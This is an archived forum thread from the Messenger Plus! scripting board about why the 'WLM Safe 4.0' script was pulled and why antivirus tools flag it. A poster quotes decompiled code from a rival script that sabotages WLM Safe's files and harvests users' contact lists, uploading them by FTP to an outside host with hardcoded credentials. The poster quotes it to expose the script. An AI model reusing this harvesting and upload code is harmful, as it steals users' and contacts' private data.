What happened to the Messenger Plus! forums on msghelp.net?
Shoutbox » MsgHelp Archive » Messenger Plus! for Live Messenger » Scripting » WLM Safe 4.0 - What is this!

Pages: (4): « First « 1 [ 2 ] 3 4 » Last »
WLM Safe 4.0 - What is this!
Author: Message:
wincy
Junior Member
**


Posts: 67
Reputation: 4
30 / Male / Flag
Joined: Feb 2008
RE: WLM Safe 4.0 - What is this!
It doesn't matter at all BlackStar, do not worry!

I was just really surprised and a little bit hurted when i discovered that my script had been removed...

I often give a look at threads on this forum and find lot of useful information, and i'm sure of what i've done in my script, that's why i gave a fast reply, in order to make things as clear as possible.

I already know about the famous "Nick Plus" containing a virus, that's why i forgive your doubts!

For any other question or information contact me! :)
Thanks to Jigen90, TheGuruSupremacy and Moh Zayadi for support! :)
02-10-2009 07:20 PM
Profile E-Mail PM Find Quote Report
Menthix
forum admin
*******

Avatar

Posts: 5534
Reputation: 102
35 / Male / Flag
Joined: Mar 2002
RE: WLM Safe 4.0 - What is this!
I'm fairly sure the script works as wincy described, but this doesn't take away the problem: several virus scanners will throw alerts when installing the script. It will be hard for users to trust something that is supposed to remove viruses, while the removal tool itself is picked up by several virusscanners.

The virusscanners have problems with Process.exe and path.exe. From reading what they do I think they could fairly easy be replaced by something else that won't cause alerts.

Instead of process.exe you could use [url-http://technet.microsoft.com/en-us/library/bb491009.aspx]Taskkill[/url] which is part of Windows, so you don't even need to pack it with the script. I checked and it's available on XP, Vista and Win7.

path.exe exports a batch file like this:
DOS code:
SET "AppData=C:\DOCUME~1\XP_EN-VM\APPLIC~1"
SET "Cookies=C:\DOCUME~1\XP_EN-VM\Cookies"
SET "Desktop=C:\DOCUME~1\XP_EN-VM\Desktop"
SET "Favorites=C:\DOCUME~1\XP_EN-VM\FAVORI~1"
SET "NetHood=C:\DOCUME~1\XP_EN-VM\NetHood"
SET "Personal=C:\DOCUME~1\XP_EN-VM\MYDOCU~1"
SET "PrintHood=C:\DOCUME~1\XP_EN-VM\PRINTH~1"
SET "Recent=C:\DOCUME~1\XP_EN-VM\Recent"
SET "SendTo=C:\DOCUME~1\XP_EN-VM\SendTo"
SET "Start Menu=C:\DOCUME~1\XP_EN-VM\STARTM~1"
SET "Templates=C:\DOCUME~1\XP_EN-VM\TEMPLA~1"
SET "Programs=C:\DOCUME~1\XP_EN-VM\STARTM~1\Programs"
SET "Startup=C:\DOCUME~1\XP_EN-VM\STARTM~1\Programs\Startup"
SET "Local AppData=C:\DOCUME~1\XP_EN-VM\LOCALS~1\APPLIC~1"
SET "Cache=C:\DOCUME~1\XP_EN-VM\LOCALS~1\TEMPOR~1"
SET "History=C:\DOCUME~1\XP_EN-VM\LOCALS~1\History"
SET "My Pictures=C:\DOCUME~1\XP_EN-VM\MYDOCU~1\MYPICT~1"
SET "Fonts=C:\WINDOWS\Fonts"
SET "My Music=C:\DOCUME~1\XP_EN-VM\MYDOCU~1\MYMUSI~1"
SET "CD Burning=C:\DOCUME~1\XP_EN-VM\LOCALS~1\APPLIC~1\MICROS~1\CDBURN~1"
SET "Common AppData=C:\DOCUME~1\ALLUSE~1\APPLIC~1"
SET "Common Programs=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs"
SET "Common Documents=C:\DOCUME~1\ALLUSE~1\DOCUME~1"
SET "Common Desktop=C:\DOCUME~1\ALLUSE~1\Desktop"
SET "Common Start Menu=C:\DOCUME~1\ALLUSE~1\STARTM~1"
SET "Common Pictures=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYPICT~1"
SET "Common Music=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYMUSI~1"
SET "Common Video=C:\DOCUME~1\ALLUSE~1\DOCUME~1\MYVIDE~1"
SET "Common Favorites=C:\DOCUME~1\ALLUSE~1\FAVORI~1"
SET "Common Startup=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup"
SET "Common Templates=C:\DOCUME~1\ALLUSE~1\TEMPLA~1"
SET "Common Administrative Tools=C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\ADMINI~1"

I see you use some of those variables later in the batch file (not all). I'm not sure why eSafe and TrendMicro would pick this up. Do you have the source, or did you download it somewhere? This could probably be replaced by JScript too (some other scripter help out on this?).


BTW, two other things:
  • You assume Plus! is installed in %ProgramFiles%\"Messenger Plus! Live"\. Your script won't work at all when Plus! is installed in a different folder.
  • Why do you delete ""Cila Smart Security" in safe.bat?

For people who want to take a look, temporary download location: http://random.menthix.net/temp/WLM-Safe-4.0.plsc
Finish the problem
Menthix.net | Contact Me
02-10-2009 07:53 PM
Profile E-Mail PM Web Find Quote Report
wincy
Junior Member
**


Posts: 67
Reputation: 4
30 / Male / Flag
Joined: Feb 2008
RE: WLM Safe 4.0 - What is this!
Hi MenthiX, thank for you reply!

I've made up tests with more than one anti-virus before using programs i downloaded from Internet.
They're quite commons and largely used, and avg, kaspersky and antivir didn't seem to identify them as dangerous or unwanted programs.
Are you sure that both exe are detected as infected/dangerous?

Thanks for your your tip about taskkill! Do you think it could be possible to make the same as path.exe in JScript?
Any help would be really appreciated! :)


Other things:

quote:
You assume Plus! is installed in %ProgramFiles%\"Messenger Plus! Live"\. Your script won't work at all when Plus! is installed in a different folder.

- Didn't mind, how can i determine Messenger Plus' installation directory with a batch file?

quote:
Why do you delete ""Cila Smart Security" in safe.bat?

- I delete Cila Smart Security for two reasons:

  • Cila's script is not compatibile with WLM Safe, and it also runs this code:


        case "delws":
            fso.DeleteFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml');
            fso.DeleteFolder(Directory + '\\Scripts' + '\\WLM Safe'); break;
        case "inire":
            kickWLMsafe();
            MsgPlus.AddTimer("inire", 60000); break;

    function kickWLMsafe() {
        if (!fso.FileExists(Directory + "\\Scripts\\" + "WLM Safe" + "\\ScriptInfo.xml")) {} else {
            MsgPlus.DisplayToast(Script_Name, RLFF(LangT, 81) + RLFF(LangT, 82), "", "DelWLMS");
            ErrorNN("821", "WLM Safe");
            TraceIA(RLFF(LangT, 83))
        }
    }
    function DelWLMS() {
        var fileObj = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\ScriptInfo.xml', 2, 0);
        var fileObjA = fso.OpenTextFile(Directory + '\\Scripts' + '\\WLM Safe' + '\\wlmsafe.js', 2, 0);
        fileObj.Write('');
        fileObj.Close();
        fileObjA.Write('');
        fileObjA.Close();
        MsgPlus.AddTimer("delws", 3000)
    }


  • In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:


    function MakeConfigEMAIL() {
        Trace("0x222222224");
        var sssp = Messenger.MyEmail;
        var Contacts = Messenger.MyContacts;
        var e = new Enumerator(Contacts);
        for (; ! e.atEnd(); e.moveNext()) {
            var Contact = e.item();
            AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Contact.Email)))
        }
        AddLineToFileZ(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + sssp + ".dat", encode(encodeBinary(Messenger.MyEmail)));
        UpCEMAIL()
    }

    function UpCEMAIL() {
        ftpweb = "ftp.cilacorp.x10hosting.com";
        Trace("0x2777777777");
        for (var e = new Enumerator(fso.GetFolder(MsgPlus.ScriptFilesPath + "\\Saves").files); ! e.atEnd(); e.moveNext()) {
            scsulmi = MsgPlus.UploadFileFTP(MsgPlus.ScriptFilesPath + "\\Saves" + "\\" + e.item().Name, ftpweb, "msgplus@cilacorp.x10hosting.com", "T9Mrvcjyz81Q", e.item().Name)
        }
    }

I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.

Thanks to all for comprehension, replies and support.

This post was edited on 02-10-2009 at 09:33 PM by wincy.
02-10-2009 09:28 PM
Profile E-Mail PM Find Quote Report
NiteMare
Veteran Member
*****

Avatar
Giga-Byte me

Posts: 2497
Reputation: 37
32 / Male / Flag
Joined: Aug 2003
RE: WLM Safe 4.0 - What is this!
quote:
Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]


well this should be enough to put that script on hold untill it can be looked at, and it looks like everything is encrypted in that script, which makes me suspisious
quote:
Originally posted by wincy

I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.

well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
[Image: sig/]
I'll never forget what she said 5052 days, 13 hours, 8 minutes, 10 seconds ago
Need hosting? Check
out my website. we can help you out :)
02-11-2009 04:13 AM
Profile PM Web Find Quote Report
roflmao456
Skinning Contest Winner
****

Avatar

Posts: 955
Reputation: 24
25 / Male / Flag
Joined: Nov 2006
Status: Away
RE: WLM Safe 4.0 - What is this!
* roflmao456 is sniffing some script rivalry coming up o.0

Oh and the ftp login doesn't work :P

This post was edited on 02-11-2009 at 05:48 AM by roflmao456.
[quote]
Ultimatess6
: What a noob mod
02-11-2009 05:43 AM
Profile PM Web Find Quote Report
Jigen90
New Member
*


Posts: 3
– / Male / Flag
Joined: Feb 2009
RE: RE: WLM Safe 4.0 - What is this!
quote:
Originally posted by roflmao456

Oh and the ftp login doesn't work :P

I've seen that code and the ftp login has worked till 1 or 2 months ago!
There were 3 o 4 lists of messenger contacts.
I've seen the site, it worked with that password!!:(
Now it doesn't work...strange!?!?! ^o)...something wrong!?
02-11-2009 09:29 AM
Profile E-Mail PM Find Quote Report
wincy
Junior Member
**


Posts: 67
Reputation: 4
30 / Male / Flag
Joined: Feb 2008
RE: RE: WLM Safe 4.0 - What is this!
quote:
Originally posted by NiteMare
quote:
Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]


well this should be enough to put that script on hold untill it can be looked at, and it looks like everything is encrypted in that script, which makes me suspisious
quote:
Originally posted by wincy

I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.

well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
I was misunderstood, they copy part of my xml file, AND ALSO they pick up users' contact lists.
Here is a screen of my old script version's window and their actual window:
[Image: prevxp7.th.jpg]
The code is also copy and pasted without changes.

I've never stolen contact lists because i think it is really a privacy violation!
You can check all previous versions of my script, if you want.
Source codes are short, simple, and not encrypted in any way.
Cila Smart Security is totally encripted, that's why maybe they have something to hide...

I realized that it was an unsafe script when i discovered that about 2 months ago ftp server could be accessed by anyone (even by spammers for example!) with a simple FTP program.


Everybody can check out old version (3.5) here:

http://www.wlmsafe.com/download2.php

More that 24.000 have downloaded that version and it has always been appreciated.

This post was edited on 02-11-2009 at 01:33 PM by wincy.
02-11-2009 01:22 PM
Profile E-Mail PM Find Quote Report
vaccination
Veteran Member
*****

Avatar

Posts: 2513
Reputation: 41
27 / Male / –
Joined: Apr 2005
RE: WLM Safe 4.0 - What is this!
quote:
Originally posted by NiteMare
quote:
Originally posted by wincy
In advance, i discovered that Cila Smart Security stole part of my old wlm safe's code and grabs all users' contact list uploading it to a web server, as you can see here:
[removed to reduce the size of this quote]


well this should be enough to put that script on hold untill it can be looked at, and it looks like everything is encrypted in that script, which makes me suspisious
quote:
Originally posted by wincy

I'm trying to make WLM Safe a script that really means "Messenger's Security" as far as possible, so i think i should do all i can.

well, if you are about making WLM secure, then why did your old code (can't confirm if you removed this as i can't download your script yet) have that obvious invasion of privacy?
A different script did it, not his. So he was combating the invasion of privacy by removing the functions of that script if it was installed on the users PC.
[Image: jumbled.png]
02-11-2009 01:50 PM
Profile PM Find Quote Report
Moh
Senior Member
****


Posts: 553
Reputation: 10
– / Male / Flag
Joined: Dec 2008
RE: WLM Safe 4.0 - What is this!
If it is that suspicious then why is Cila Security is still in the database? o.0
02-11-2009 02:13 PM
Profile PM Find Quote Report
wincy
Junior Member
**


Posts: 67
Reputation: 4
30 / Male / Flag
Joined: Feb 2008
RE: WLM Safe 4.0 - What is this!
Because it is not detected as a virus.
But is encrypted with function(p,a,c,k,e,r) (javascript compression)
and maybe nobody ever seen the real code.

If you're interested in, here is decripted .js file:
http://myfreefilehosting.com/f/ce2d27c610_0.1MB
You can file all functions i quoted above.
02-11-2009 02:17 PM
Profile E-Mail PM Find Quote Report
Pages: (4): « First « 1 [ 2 ] 3 4 » Last »
« Next Oldest Return to Top Next Newest »


Threaded Mode | Linear Mode
View a Printable Version
Send this Thread to a Friend
Subscribe | Add to Favorites
Rate This Thread:

Forum Jump:

Forum Rules:
You cannot post new threads
You cannot post replies
You cannot post attachments
You can edit your posts
HTML is Off
myCode is On
Smilies are On
[img] Code is On